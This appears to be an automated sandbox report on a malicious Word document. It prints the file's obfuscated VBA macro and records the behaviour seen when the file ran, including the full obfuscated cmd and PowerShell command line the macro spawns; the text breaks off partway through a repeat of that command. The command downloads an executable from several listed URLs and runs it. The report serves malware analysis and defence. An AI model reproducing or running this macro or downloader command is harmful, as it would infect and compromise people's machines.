17959 - 17959hStun = AmlJwGiXlAjV = (EiAHa / LInkzH / 55302 / Fix(PmHiZ)) + 63874 - CLng(CpoPHa + CLng(51028)) + YdQUZv + 97790 * lTKPr - CStr(98612) / KqiiO / CLng(iWGoYC)MrTCkW = GinDGUVKPS = (DoiZd / MAuHKf / 2471 / Fix(FFtAIi)) + 41232 - CLng(ubDbbz + CLng(32479)) + LrWRw + 8208 * SqJYVT - CStr(97487) / HBNLP / CLng(JGnlSu)End Sub", File "izosJmiC.bas" (Streampath: "Macros/VBA/izosJmiC") has code: "Function wSTJs(zHhlB)AZcDdi = tiZDNtdWGzM = (szzHtc / hCdBu / 60563 / Fix(iXLof)) + 7886 - CLng(JXYOGS + CLng(98489)) + dBkZS + 10208 * cVKBZ - CStr(43104) / EYJifO / CLng(KRRIE)ZYsnKJ = YcRVNbvpii = (IRTAFY / kQSjTQ / 27562 / Fix(dDcWq)) + 30454 - CLng(ScGoU + CLng(48389)) + KVmmiv + 35230 * XnPXY - CStr(90150) / swEwl / CLng(sNHnOw)qtQDNz = zwjlSWfoHS = (QMjIjW / oSHfwP / 97607 / Fix(PiXMK)) + 51922 - CLng(IvRTji + CLng(53493)) + YzVXj + 74165 * lhjZJ - CStr(76315) / RhWTjG / CLng(RvIPb)oqQpF = FjfdrjItpf = (RBSijw / wULGE / 24869 / Fix(FiSuR)) + 82532 - CLng(ziGmE + CLng(59119)) + DwIcP + 43585 * alJGTd - CStr(14555) / ucaQjN / CLng(pwYoSU)End FunctionFunction VCRPjlv(IjuBXbKwG)MsfRK = WCioqJzInzNL = (ndLnv / EIJDbE / 58389 / Fix(ZRbBS)) + 23509 - CLng(rzlaa + CLng(65862)) + jLabG + 28100 * ijrWWq - CStr(27225) / bNlfYY / CLng(Mwuzkv)ZNUGEb = czzPaqjiwVGw = (YovKc / zijHdk / 4585 / Fix(iCQmm)) + 91653 - CLng(NnPzhG + CLng(55246)) + zddzJ + 2410 * Zwbmw - CStr(96400) / qlqod / CLng(cjjUC)KAfMv = WNidAmGFcUKA = (AuwdGs / XoRuJu / 70652 / Fix(YtjjCb)) + 71080 - CLng(NlEvXz + CLng(418)) + YTFYP + 7138 * GCHwY - CStr(33444) / qrIPhi / CLng(izVPKj)VCRPjlv = IjuBXbKwGCzFYoF = ppMbUcdvcMS = (uMmHSR / tWjIFU / 19906 / Fix(EBajL)) + 24946 - CLng(CvoMr + CLng(15265)) + CsCrE + 94251 * KzGXic - CStr(37420) / DWAhY / CLng(tCdGR)End FunctionFunction wQpJm(ByVal LYpRJHtwuOCsR As String, mGqOdYnIP, XwERnXf)On Error Resume NextKqTFaT = TrGNPNuETMh = (hwsSMJ / cIqZlm / 6257 / Fix(UdBwKk)) + 99750 - CLng(zIkTK + CLng(58511)) + iQYhMN + 97397 * sQkPK - CStr(2629) / cdKiab / CLng(QXAhi)RvCwZNlBhCkjjj = JcqYwTHJMFrRV + StrReverse(LYpRJHtwuOCsR) + IfaUpMQjGJEOPABh = fDsPaLrtXQX = (REzJk / fsVddV / 62028 / Fix(uFrIKY)) + 25020 - CLng(RjsEOE + CLng(95958)) + tQjqK + 99257 * GPEBl - CStr(20402) / PuuPWl / CLng(OFzFf)fBZnrWF = PRfibuCkMmpl + Mid(qltFWbbrUwKwh + RvCwZNlBhCkjjj + QiKjlfM, ojWaqIpCHFdcuR + mGqOdYnIP + zciEwvSVj, XwERnXf) + ilFCCEGirwJjwSBSqFU = RzJKHaQDWO = (jHWkzE / XuDUL / 31391 / Fix(tludbP)) + 28503 - CLng(Rmvrvz + CLng(61212)) + oauwP + 55975 * RSmEzK - CStr(27312) / zuaNpV / CLng(uwXrqk)wQpJm = IIDrcPuRTRQp + fBZnrWF + KpLRiDHzwVqwNfwZ = mLcJdGizkj = (JzzrPF / GNndqL / 75692 / Fix(AfBPV)) + 89182 - CLng(diBALJ + CLng(21517)) + DWQVMm + 83705 * zZISJ - CStr(97872) / lwqiFD / CLng(ULjPTV)PudvSj = ZpbfJDqMbki = (PCVbFs / CFpzT / 42995 / Fix(iffXr)) + 29268 - CLng(LIPCwc + CLng(88830)) + zEioZb + 24375 * BpZdE - CStr(40122) / dMmMU / CLng(jEtPT)End FunctionFunction tGYJQ(XFkSi)mWGdhR = YqIlpJZTSAl = (FXSSd / JRjPQL / 65699 / Fix(ZwEDWb)) + 57589 - CLng(MlViAA + CLng(74155)) + mjjFq + 29411 * oABHT - CStr(83487) / rZHTpa / CLng(PdJvK)hzufI = ccjicwvQCVT = (Eltva / KLpXGW / 19234 / Fix(EVrGVw)) + 78568 - CLng(wLviU + CLng(60437)) + zMIplG + 50126 * CTzwTm - CStr(10732) / HSSGZ / CLng(wzVVo)izwLfh = KwjYaipmWAVc = (lnMCZF / QIUQR / 76794 / Fix(CXnSm)) + 88802 - CLng(bauscr + CLng(70057)) + dUzMs + 94297 * kJGcT - CStr(88925) / MIIqdm / CLng(ihjiw)MRJzN = GiAQFvqniMK = (AkOljl / zuumP / 56881 / Fix(mzSzIO)) + 61618 - CLng(LLrDvV + CLng(93701)) + EVZIzZ + 95618 * aLzqLj - CStr(26345) / bAVqV / CLng(DvuMZD)End FunctionFunction zPHvPqrDOGFFzX()On Error Resume NextfqsASq = qVzNBZzPpcb = (qbuAGG / RiOkzu / 73604 / Fix(UGpstw)) + 20811 - CLng(CIojF + CLng(11453)) + EkwEDE + 92018 * uLQzMH - CStr(25964) / HzicI / CLng(jhBfV)mpIFv = ncFjJQovrp = (Irrnd / TfBFz / 14167 / Fix(bCRKN)) + 78728 - CLng(YFhYNH + CLng(45110)) + FfziEw + 46549 * MzLml - CStr(31007) / hfwYhM / CLng(dhCPvD)qaBbOcw = wQpJm("i.%@S5i V/ %^c^EzK", 80769 + 3 - 80769, 80769 + 20 - 80769)TaWwU = WFOCMDFLBCoI = (zsOjp / FBRjpD / 39698 / Fix(sZpnR)) + 80469 - CLng(bQvMij + CLng(88883)) + fAamz + 19298 * LnIiUV - CStr(76787) / MIiTMl / CLng(OXSdY)lLkwnI = AOWwBIzikf = (jHkvIA / CYDilA / 96510 / Fix(wHivq)) + 88404 - CLng(uwaEO + CLng(29909)) + owVjm + 5643 * APcwM - CStr(12579) / zflwDp / CLng(pDppp)RciIIYjrLiK = wQpJm(",74Ep^S^m^ojf@", 54636 + 4 - 54636, 54636 + 7 - 54636)MmVDl = okEMEvpzrC = (dnYzSo / LZDwv / 61736 / Fix(wcMOuZ)) + 19647 - CLng(SAsTj + CLng(69846)) + ALwBq + 22682 * BPTjw - CStr(51368) / kmJjNR / CLng(djzcp)ocTvj = wpnRYvsWpHh = (LJcnu / mJvvN / 88094 / Fix(uIwjCQ)) + 12966 - CLng(OMbhz + CLng(88516)) + UavTI + 59325 * uMpYu - CStr(93545) / DtaXZB / CLng(tpnqa)bXSsKjjnooi = wQpJm("cRkY soLFNFiN dw4kmS", 54181 + 6 - 54181, 54181 + 13 - 54181)zwAFz = OoUAtTtNmqd = (KUKTB / XsJak / 16012 / Fix(hPDwLk)) + 51920 - CLng(hzitjl + CLng(12041)) + BHwJT + 32358 * mdzuaO - CStr(10865) / ksPEE / CLng(PbGCic)iqzILs = ssQaEolhfZf = (IdFGAj / nTcjw / 19809 / Fix(VviPt)) + 96872 - CLng(ccYSow + CLng(74896)) + YmInz + 75130 * lsIij - CStr(59600) / QjbuM / CLng(pCPjj)nkSOaEVHQJA = wQpJm("RfjE8^p^S^m^o^c^% 8D", 44316 + 3 - 44316, 44316 + 16 - 44316)jBjnMh = buqXLaVJlH = (RSDLo / ulUWWW / 55496 / Fix(BGzEF)) + 91772 - CLng(GDiaLQ + CLng(64706)) + zfRIRO + 58867 * pswSvF - CStr(9044) / TvELU / CLng(FjLQL)mXFSlm = jAhYOONltAm = (BIPNn / AnZXiU / 14406 / Fix(kKJrdj)) + 57334 - CLng(MIJjjF + CLng(7645)) + vFlfw + 56607 * sipmN - CStr(12666) / zEHndD / CLng(CXFvVw)zZMOif = wQpJm("Rcs.AbRp c/ k", 27694 + 2 - 27694, 27694 + 14 - 27694)DHNuj = cdjbzCQNou = (ajJFZ / cAvsij / 68637 / Fix(hBpWbr)) + 56621 - CLng(BVVfp + CLng(42061)) + MpiLf + 90565 * zwiSS - CStr(67638) / juDsW / CLng(BbqMC)czwNKb = jjzcqCzSjzE = (zwiaB / ZaQWbk / 30963 / Fix(HBGOi)) + 88781 - CLng(jiHJUw + CLng(94007)) + LfNBZ + 93313 * RVMaCM - CStr(30072) / Xrazs / CLng(LRQJoR)AcFariHSO = wQpJm("SQu.EozMFTWzaojzGLMGX", 75315 + 3 - 75315, 75315 + 15 - 75315)aRhnc = ErOiqbkkCH = (PQVjRt / DLANwr / 71225 / Fix(SqEfmZ)) + 87251 - CLng(VJIjt + CLng(33891)) + aPISY + 1925 * rznqYH - CStr(8465) / RrFbIt / CLng(WVSWFz)kUaWU = NiSwkzwAJWA = (drjOAM / QRCEX / 93820 / Fix(qwSCN)) + 18946 - CLng(mrqmzw + CLng(29938)) + HFIbl + 69510 * AFaKJ - CStr(93440) / fOYnQI / CLng(iGJqh)UqlOoiZIs = wQpJm("5W5WIntb ZAZjtTrjl5F", 49573 + 5 - 49573, 49573 + 11 - 49573)ztcDOv = JzvwLjwNcCAv = (McNJhG / YwzkE / 85968 / Fix(GcXvN)) + 95416 - CLng(hSccja + CLng(6663)) + iGplB + 76281 * Ptjoh - CStr(71059) / wLHqZp / CLng(FHnwEi)zONwHn = uOSKwiSOjL = (JErOp / Izkip / 43155 / Fix(jTjlF)) + 93762 - CLng(DZAzSX + CLng(37663)) + liFVG + 48789 * mGzYp - CStr(96724) / ULYvpS / CLng(zjJmZ)OlVTiuDr = wQpJm("X0ZWTcX %^c^E^L@", 19510 + 3 - 19510, 19510 + 7 - 19510)kEuwR = uNGdUQKhaljH = (PEoYWh / Mnzvi / 62525 / Fix(lhLDG)) + 99624 - CLng(aOhEf + CLng(89065)) + UXvcf + 74136 * jQWaj - CStr(77140) / aIiljs / CLng(zPiZH)nubQj = zkjGHQiHAboi = (DznLl / BQzCw / 31960 / Fix(amLbf)) + 64259 - CLng(kWSoit + CLng(72314)) + iPECz + 18119 * nGQfP - CStr(78587) / khHqMM / CLng(wYvHhV)sHiwkDEW = wQpJm("6ZZJqm4tB", 68674 + 4 - 68674, 68674 + 1 - 68674)hzjsfc = kzwQuVELARIA = (ljnjZd / qIuSnX / 12915 / Fix(jnkMC)) + 890 - CLng(LZSqzr + CLng(26082)) + pZUvwS + 87287 * Gwuto - CStr(2592) / GzrzcM / CLng(vwlBVN)VYXYm = wFzifntthqwZ = (zrpCRO / Fwjjoo / 94297 / Fix(iSCNs)) + 60895 - CLng(QTncHQ + CLng(72819)) + GJQUO + 59210 * VHXWtJ - CStr(27441) / rzocPO / CLng(ljSHaW)llfVuRfJGwT = wQpJm("BZ^c^% & SoEkSiqw2w2M", 28185 + 8 - 28185, 28185 + 16 - 28185)oHLTW = ZXTilvvpWmiC = (wdSnW / TYkCH / 8889 / Fix(FSQKZ)) + 74921 - CLng(VTfGrT + CLng(33175)) + vKfZXw + 36618 * pXwLJ - CStr(3132) / Rahjrc / CLng(LMvQC)wMwDtb = aWihNmancbc = (jNfKk / PVwSd / 12814 / Fix(qMcbtR)) + 65438 - CLng(MuszV + CLng(9682)) + zYkTo + 66219 * kjmSUL - CStr(15862) / DEaQww / CLng(LjKuvT)zPHvPqrDOGFFzX = sHiwkDEW + bXSsKjjnooi + AcFariHSO + UqlOoiZIs + llfVuRfJGwT + RciIIYjrLiK + OlVTiuDr + nkSOaEVHQJA + qaBbOcw + zZMOifnKOUv = aiJSObwoazW = (lqnZE / YBMAJ / 88228 / Fix(dRtbEz)) + 31262 - CLng(AVvICC + CLng(39685)) + WIMYf + 64588 * zkJLXU - CStr(27460) / AYbQJC / CLng(WzGdl)sRXULw = ABpjqOujdz = (zpuhja / XDAQDX / 66571 / Fix(zcovn)) + 26529 - CLng(NLRQoD + CLng(89207)) + DEEhW + 6019 * kouibF - CStr(99968) / mLHVOR / CLng(hKlBbj)End FunctionSub SmZcw(LzqMAC, ABEmrN, iEjifo)WuwUb = UVIJwCZnVv = (LZsjF / JOJlOF / 81407 / Fix(JmoFur)) + 48222 - CLng(Xisuok + CLng(20096)) + rilOT + 28026 * qozKN - CStr(8126) / HCTBzQ / CLng(ibDvXB)nLJZD = tfUccUwQwjL = (oXpbnm / PJHhSw / 24920 / Fix(CdnkJ)) + 90541 - CLng(birYCv + CLng(74157)) + fWjmN + 81529 * jWnJtk - CStr(46208) / KjiRvn / CLng(wCpwv)End SubSub kOjwc()bKiKzN = tRzzBDvhsT = (qdXahz / uqzID / 21329 / Fix(twcbV)) + 66658 - CLng(quqwD + CLng(76989)) + rLCWPU + 73071 * EjBNl - CStr(35807) / tJtok / CLng(HTFWl)AjjcdJ = CfwlnifrsZI = (lcBhFO / hkrzA / 58943 / Fix(liYHXE)) + 32000 - CLng(jwXFz + CLng(11893)) + PbfNnp + 46529 * wWPFnS - CStr(76284) / lJwsBT / CLng(CEjVsE)End Sub" - source
- Static Parser
- relevance
- 10/10
-
Creates a writable file in a temporary directory
- details
-
"WINWORD.EXE" created file "%TEMP%\~DF2F148B5B5B91DB95.TMP"
"WINWORD.EXE" created file "%TEMP%\~DF4100A96C945085FB.TMP" - source
- API Call
- relevance
- 1/10
-
Creates mutants
- details
-
"\Sessions\1\BaseNamedObjects\Local\10MU_ACBPIDS_S-1-5-5-0-57312"
"\Sessions\1\BaseNamedObjects\Local\10MU_ACB10_S-1-5-5-0-57312"
"\Sessions\1\BaseNamedObjects\Global\552FFA80-3393-423d-8671-7BA046BB5906"
"\Sessions\1\BaseNamedObjects\Local\ZonesCounterMutex"
"\Sessions\1\BaseNamedObjects\Local\ZoneAttributeCacheCounterMutex"
"\Sessions\1\BaseNamedObjects\Local\ZonesCacheCounterMutex"
"\Sessions\1\BaseNamedObjects\Local\ZonesLockedCacheCounterMutex"
"\Sessions\1\BaseNamedObjects\Global\MTX_MSO_Formal1_S-1-5-21-4162757579-3804539371-4239455898-1000"
"\Sessions\1\BaseNamedObjects\Global\MTX_MSO_AdHoc1_S-1-5-21-4162757579-3804539371-4239455898-1000"
"\Sessions\1\BaseNamedObjects\Global\MsoShellExtRegAccess_S-1-5-21-4162757579-3804539371-4239455898-1000"
"Local\ZonesCounterMutex"
"Global\MTX_MSO_AdHoc1_S-1-5-21-4162757579-3804539371-4239455898-1000"
"Local\ZonesLockedCacheCounterMutex"
"Global\MsoShellExtRegAccess_S-1-5-21-4162757579-3804539371-4239455898-1000"
"Local\10MU_ACBPIDS_S-1-5-5-0-57312"
"Local\ZoneAttributeCacheCounterMutex"
"Local\ZonesCacheCounterMutex"
"Global\552FFA80-3393-423d-8671-7BA046BB5906" - source
- Created Mutant
- relevance
- 3/10
-
Drops files marked as clean
- details
- Antivirus vendors marked dropped file "~WRD0002.tmp" as clean (type is "Composite Document File V2 Document Cannot read section info")
- source
- Binary File
- relevance
- 10/10
-
Loads rich edit control libraries
- details
- "WINWORD.EXE" loaded module "%COMMONPROGRAMFILES%\microsoft shared\OFFICE14\RICHED20.DLL" at 639C0000
- source
- Loaded Module
-
Loads the .NET runtime environment
- details
- "powershell.exe" loaded module "%WINDIR%\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\mscorlib.dll" at 62160000
- source
- Loaded Module
-
Process launched with changed environment
- details
-
Process "cmd.exe" (Show Process) was launched with new environment variables: "WecVersionForRosebud.9CC="4""
Process "powershell.exe" (Show Process) was launched with new environment variables: "%lhmbWskWwNVkUzp%="oQllFASCBHr", %HvpurunsRmnvjbm%="zJlPRBwG", %musHwkwosI%="er", %fFhDGzjnXmhYvNz%="hHRrroJFEpzXJ", %mGqOdYnIP%="ll", %fBZnrWF%="ow", %dowlFKYHb%="ow", %GTHGTVYqDCTUTHV%="JNMwizhaTsz", %pKskGkVXEDjT%="p", %oXmdLMdsYfUoN%="s", %LYpRJHtwuOCsR%="p", %XwERnXf%="he""
Process "57463.exe" (Show Process) was launched with modified environment variables: "PSModulePath" - source
- Monitored Target
- relevance
- 10/10
-
Removes Office resiliency keys (often used to avoid problems opening documents)
- details
-
"WINWORD.EXE" (Access type: "DELETEVAL"; Path: "HKCU\SOFTWARE\MICROSOFT\OFFICE\14.0\WORD\RESILIENCY\STARTUPITEMS"; Key: "&'F")
"WINWORD.EXE" (Access type: "DELETEVAL"; Path: "HKCU\SOFTWARE\MICROSOFT\OFFICE\14.0\WORD\RESILIENCY\STARTUPITEMS"; Key: "32G")
"WINWORD.EXE" (Access type: "DELETEVAL"; Path: "HKCU\SOFTWARE\MICROSOFT\OFFICE\14.0\WORD\RESILIENCY\STARTUPITEMS"; Key: "6&F")
"WINWORD.EXE" (Access type: "DELETE"; Path: "HKCU\SOFTWARE\MICROSOFT\OFFICE\14.0\WORD\RESILIENCY\STARTUPITEMS") - source
- Registry Access
- relevance
- 10/10
-
Runs shell commands
- details
-
"Cmd NiFNFLos YkMLGzjoazWTFMzoErTtjZAZ btnSkEoS & %^c^o^m^S^p^E^c^% %^c^o^m^S^p^E^c^% /V /c set %HvpurunsRmnvjbm%=zJlPRBwG&&set %pKskGkVXEDjT%=p&&set %dowlFKYHb%=o^w&&set %GTHGTVYqDCTUTHV%=JNMwizhaTsz&&set %LYpRJHtwuOCsR%=!%pKskGkVXEDjT%!&&set %fFhDGzjnXmhYvNz%=hHRrroJFEpzXJ&&set %musHwkwosI%=e^r&&set %fBZnrWF%=!%dowlFKYHb%!&&set %oXmdLMdsYfUoN%=s&&set %lhmbWskWwNVkUzp%=oQllFASCBHr&&set %XwERnXf%=he&&set %mGqOdYnIP%=ll&&!%LYpRJHtwuOCsR%!!%fBZnrWF%!!%musHwkwosI%!!%oXmdLMdsYfUoN%!!%XwERnXf%!!%mGqOdYnIP%! ". ( $psHOme[4]+$Pshome[30]+'x') ( ((' ((9Um1xAnsada9Um+9'+'Ums9Um+9Umd = &9Um+9Um(O9Um+9UmQJn9Um+9UmO9Um+9UmQJ+OQJ9Um+9UmeOQJ+OQ9Um+9UmJw-ob9Um+9Umj9Um+9UmecOQJ+OQ9Um+9UmJ9Um+9UmtOQJ9Um+9Um) ran9Um+9Umdom;9Um+9Um'+'1x9Um+9Um'+'A9Um+9UmYY9Um+9UmU 9Um+9Um= .'+'9Um+9Um(9U'+'m+9UmO9Um+9UmQJneO9Um+9UmQJ+OQJwOQ9Um+9UmJ+OQJ-o9Um+9Umbject9Um+9UmO9Um+9UmQJ) Syst9Um+9Umem9Um+9Um.Net.W9Um+9UmebClient;'+'1xA9Um+9UmNS9Um+9UmB = 19Um+9Umx9Um+9U'+'mAn9Um+9Um'+'sadas9Um+9Umd.next(9Um+9Um10009Um+9Um0, 9'+'Um+9Um29Um+9Um82133'+');1xA9Um+9UmADCX9Um+9Um = OQJ9Um+9'+'Um 9Um+9Um http9Um+9Um://i9Um+9Umfc9Um+9Umingen9Um+9Umier9Um+9Umia.9Um+9Umc9Um+9Uml/9Um+9Um79Um+9Um'+'6j9Um+9Um49Um+'+'9Umq9Um+9Umo'+'/@9Um+'+'9Umht9Um+9Umtp9Um+9Um:9Um+9Um//9Um+9Umk9Um+9Ume9Um+9Umith9Um+9Umda9Um+9Umley.co.u9Um+9Umk/wp9Um+9Ump-app/R9Um+9Umaoz/@h9Um+9Umttp:/9Um+9Um/is9Um+9Umchka.com/TQA9Um+9Um59Um+9Um4/@h9Um+9Umttp:/9Um+9Um/9Um+9Umda9Um+9Umt9Um+9Um'+'o9Um+9Ums.com.tw'+'/i9Um+9Umm9Um+9Umag9Um+9Ume/pr9Um+9Umo9Um+9U'+'mdu9Um+9Umc9Um+9U'+'mt9Um+9Um/pic_9Um+9Ums/Jnut9Um+9Um/@9Um+9Umht9Um+9Umtp://ki9'+'Um+9Ume'+'f9Um+9Umer9Um+9Umne9Um+9Umt.eu/D9Um+9Um505IR9Um+9Um1/O9Um+9UmQJ.9Um+9UmS9Um+9Umplit(9Um+9UmOQ9Um+9UmJ@O9Um+9UmQJ);1xASDC'+' 9Um+9Um= 9Um+9Um19Um+9Umx9Um+9UmA9Um+9Ume9Um+9Umnv:9Um+9Umpu9Um+9Umbl9Um+9Umi'+'c + O9'+'Um+9UmQ9'+'Um+9UmJ19xOQJ 9Um+9Um+ 1xA9Um+9UmNSB 9Um+9Um+ 9Um+9Um('+'OQJ9U'+'m+9Um.9Um+9Ume9Um+9Umx9Um+9UmOQJ+9Um+9UmOQ9Um+9UmJ'+'e9Um+9UmOQ9Um+9UmJ);'+'fo'+'9Um+9Umre9Um+9Uma9Um+9Umc9Um+9'+'Umh(19Um+9UmxA9Um+9Umasf9U'+'m+9Umc 9Um'+'+9Umin 1x9Um+9UmAADC9Um+9UmX){tr9Um+9Umy{1xA9Um+9UmYYU.9epD9Um+9Umo9Um+9UmftD9U'+'m+9UmWnlftD9Um+9UmOa9Um+9UmdFIftDle9e'+'p9Um+9Um(1'+'xAas9Um+9Umfc.99Um+9Ume9Um+9UmpToStrftDiftDNg9Um+9Um9e9Um+9Ump()9Um+9Um
19U'+'m+9UmxASDC);9Um'+'+9Um&(OQJ9Um+9UmIn9Um+9UmvoO9Um+9UmQJ+OQJ'+'kOQ9Um+9UmJ+OQJ9Um+9Ume-9Um+9UmIt9Um+9UmemOQJ)9Um+9Um(19Um+9UmxA9Um+9UmS9Um+9UmDC'+'9Um+9Um);9'+'Um+9Umbrea9Um+9Umk;}9Um+9Umcatch{9Um+9Um'+'}'+'}9Um) -rEplACe9UmftD'+'9Um
[CHAR]96-rEplACe ([C'+'HAR]57+'+'[CHAR]10'+'1+['+'CHAR]112)
[CHAR]34 -'+'r'+'EplACe 9Um19'+'x9Um'+'
[CHAR]92-CReplace '+' ([CHAR]79+[C'+'HAR]81+[C'+'HAR]74)
[CHA'+'R]39 -CReplace 9Um1'+'xA9Um
'+'[CHAR]36) 6aj.( u'+'iCpShOMe[4]+uiCpsHome[34'+']+9Umx9Um)')-rePlAcE([cHar]57+[cHar]85+[cHar]109),[cHar]39 -CrepLacE 'uiC'
[cHar]36 -rePlAcE ([cHar]54+[cHar]97+[cHar]106)
[cHar]124))" on 2018-5-17.14:53:49.766 - source
- Monitored Target
- relevance
- 5/10
-
Scanning for window names
- details
-
"WINWORD.EXE" searching for class "REListbox20W"
"WINWORD.EXE" searching for class "OfficeTooltip"
"WINWORD.EXE" searching for class "MsoCommandBarPopup"
"WINWORD.EXE" searching for class "mspim_wnd32"
"WINWORD.EXE" searching for class "MSOBALLOON"
"WINWORD.EXE" searching for class "MsoHelp10"
"WINWORD.EXE" searching for class "AgentAnim" - source
- API Call
- relevance
- 10/10
-
Spawns new processes
- details
-
Spawned process "cmd.exe" with commandline "Cmd NiFNFLos YkMLGzjoazWTFMzoErTtjZAZ btnSkEoS & %^c^o^m^S^p^E^c^% %^c^o^m^S^p^E^c^% /V /c set %HvpurunsRmnvjbm%=zJlPRBwG&&set %pKskGkVXEDjT%=p&&set %dowlFKYHb%=o^w&&set %GTHGTVYqDCTUTHV%=JNMwizhaTsz&&set %LYpRJHtwuOCsR%=!%pKskGkVXEDjT%!&&set %fFhDGzjnXmhYvNz%=hHRrroJFEpzXJ&&set %musHwkwosI%=e^r&&set %fBZnrWF%=!%dowlFKYHb%!&&set %oXmdLMdsYfUoN%=s&&set %lhmbWskWwNVkUzp%=oQllFASCBHr&&set %XwERnXf%=he&&set %mGqOdYnIP%=ll&&!%LYpRJHtwuOCsR%!!%fBZnrWF%!!%musHwkwosI%!!%oXmdLMdsYfUoN%!!%XwERnXf%!!%mGqOdYnIP%! ". ( $psHOme[4]+$Pshome[30]+'x') ( ((' ((9Um1xAnsada9Um+9'+'Ums9Um+9Umd = &9Um+9Um(O9Um+9UmQJn9Um+9UmO9Um+9UmQJ+OQJ9Um+9UmeOQJ+OQ9Um+9UmJw-ob9Um+9Umj9Um+9UmecOQJ+OQ9Um+9UmJ9Um+9UmtOQJ9Um+9Um) ran9Um+9Umdom;9Um+9Um'+'1x9Um+9Um'+'A9Um+9UmYY9Um+9UmU 9Um+9Um= .'+'9Um+9Um(9U'+'m+9UmO9Um+9UmQJneO9Um+9UmQJ+OQJwOQ9Um+9UmJ+OQJ-o9Um+9Umbject9Um+9UmO9Um+9UmQJ) Syst9Um+9Umem9Um+9Um.Net.W9Um+9UmebClient;'+'1xA9Um+9UmNS9Um+9UmB = 19Um+9Umx9Um+9U'+'mAn9Um+9Um'+'sadas9Um+9Umd.next(9Um+9Um10009Um+9Um0, 9'+'Um+9Um29Um+9Um82133'+');1xA9Um+9UmADCX9Um+9Um = OQJ9Um+9'+'Um 9Um+9Um http9Um+9Um://i9Um+9Umfc9Um+9Umingen9Um+9Umier9Um+9Umia.9Um+9Umc9Um+9Uml/9Um+9Um79Um+9Um'+'6j9Um+9Um49Um+'+'9Umq9Um+9Umo'+'/@9Um+'+'9Umht9Um+9Umtp9Um+9Um:9Um+9Um//9Um+9Umk9Um+9Ume9Um+9Umith9Um+9Umda9Um+9Umley.co.u9Um+9Umk/wp9Um+9Ump-app/R9Um+9Umaoz/@h9Um+9Umttp:/9Um+9Um/is9Um+9Umchka.com/TQA9Um+9Um59Um+9Um4/@h9Um+9Umttp:/9Um+9Um/9Um+9Umda9Um+9Umt9Um+9Um'+'o9Um+9Ums.com.tw'+'/i9Um+9Umm9Um+9Umag9Um+9Ume/pr9Um+9Umo9Um+9U'+'mdu9Um+9Umc9Um+9U'+'mt9Um+9Um/pic_9Um+9Ums/Jnut9Um+9Um/@9Um+9Umht9Um+9Umtp://ki9'+'Um+9Ume'+'f9Um+9Umer9Um+9Umne9Um+9Umt.eu/D9Um+9Um505IR9Um+9Um1/O9Um+9UmQJ.9Um+9UmS9Um+9Umplit(9Um+9UmOQ9Um+9UmJ@O9Um+9UmQJ);1xASDC'+' 9Um+9Um= 9Um+9Um19Um+9Umx9Um+9UmA9Um+9Ume9Um+9Umnv:9Um+9Umpu9Um+9Umbl9Um+9Umi'+'c + O9'+'Um+9UmQ9'+'Um+9UmJ19xOQJ 9Um+9Um+ 1xA9Um+9UmNSB 9Um+9Um+ 9Um+9Um('+'OQJ9U'+'m+9Um.9Um+9Ume9Um+9Umx9Um+9UmOQJ+9Um+9UmOQ9Um+9UmJ'+'e9Um+9UmOQ9Um+9UmJ);'+'fo'+'9Um+9Umre9Um+9Uma9Um+9Umc9Um+9'+'Umh(19Um+9UmxA9Um+9Umasf9U'+'m+9Umc 9Um'+'+9Umin 1x9Um+9UmAADC9Um+9UmX){tr9Um+9Umy{1xA9Um+9UmYYU.9epD9Um+9Umo9Um+9UmftD9U'+'m+9UmWnlftD9Um+9UmOa9Um+9UmdFIftDle9e'+'p9Um+9Um(1'+'xAas9Um+9Umfc.99Um+9Ume9Um+9UmpToStrftDiftDNg9Um+9Um9e9Um+9Ump()9Um+9Um
19U'+'m+9UmxASDC);9Um'+'+9Um&(OQJ9Um+9UmIn9Um+9UmvoO9Um+9UmQJ+OQJ'+'kOQ9Um+9UmJ+OQJ9Um+9Ume-9Um+9UmIt9Um+9UmemOQJ)9Um+9Um(19Um+9UmxA9Um+9UmS9Um+9UmDC'+'9Um+9Um);9'+'Um+9Umbrea9Um+9Umk;}9Um+9Umcatch{9Um+9Um'+'}'+'}9Um) -rEplACe9UmftD'+'9Um
[CHAR]96-rEplACe ([C'+'HAR]57+'+'[CHAR]10'+'1+['+'CHAR]112)
[CHAR]34 -'+'r'+'EplACe 9Um19'+'x9Um'+'
[CHAR]92-CReplace '+' ([CHAR]79+[C'+'HAR]81+[C'+'HAR]74)
[CHA'+'R]39 -CReplace 9Um1'+'xA9Um
'+'[CHAR]36) 6aj.( u'+'iCpShOMe[4]+uiCpsHome[34'+']+9Umx9Um)')-rePlAcE([cHar]57+[cHar]85+[cHar]109),[cHar]39 -CrepLacE 'uiC',[cHar]36 -rePlAcE ([cHar]54+[cHar]97+[cHar]106),[cHar]124))" (UID: 00010503-00004016, Additional Context: "Cmd NiFNFLos YkMLGzjoazWTFMzoErTtjZAZ btnSkEoS & %comSpEc% %comSpEc% /V /c set %HvpurunsRmnvjbm%=zJlPRBwG&&set %pKskGkVXEDjT%=p&&set %dowlFKYHb%=ow&&set %GTHGTVYqDCTUTHV%=JNMwizhaTsz&&set %LYpRJHtwuOCsR%=!%pKskGkVXEDjT%!&&set %fFhDGzjnXmhYvNz%=hHRrroJFEpzXJ&&set %musHwkwosI%=er&&set %fBZnrWF%=!%dowlFKYHb%!&&set %oXmdLMdsYfUoN%=s&&set %lhmbWskWwNVkUzp%=oQllFASCBHr&&set %XwERnXf%=he&&set %mGqOdYnIP%=ll&&!%LYpRJHtwuOCsR%!!%fBZnrWF%!!%musHwkwosI%!!%oXmdLMdsYfUoN%!!%XwERnXf%!!%mGqOdYnIP%! ". ( $psHOme[4]+$Pshome[30]+'x') ( ((' ((9Um1xAnsada9Um+9'+'Ums9Um+9Umd = &9Um+9Um(O9Um+9UmQJn9Um+9UmO9Um+9UmQJ+OQJ9Um+9UmeOQJ+OQ9Um+9UmJw-ob9Um+9Umj9Um+9UmecOQJ+OQ9Um+9UmJ9Um+9UmtOQJ9Um+9Um) ran9Um+9Umdom;9Um+9Um'+'1x9Um+9Um'+'A9Um+9UmYY9Um+9UmU 9Um+9Um= .'+'9Um+9Um(9U'+'m+9UmO9Um+9UmQJneO9Um+9UmQJ+OQJwOQ9Um+9UmJ+OQJ-o9Um+9Umbject9Um+9UmO9Um+9UmQJ) Syst9Um+9Umem9Um+9Um.Net.W9Um+9UmebClient;'+'1xA9Um+9UmNS9Um+9UmB = 19Um+9Umx9Um+9U'+'mAn9Um+9Um'+'sadas9Um+9Umd.next(9Um+9Um10009Um+9Um0, 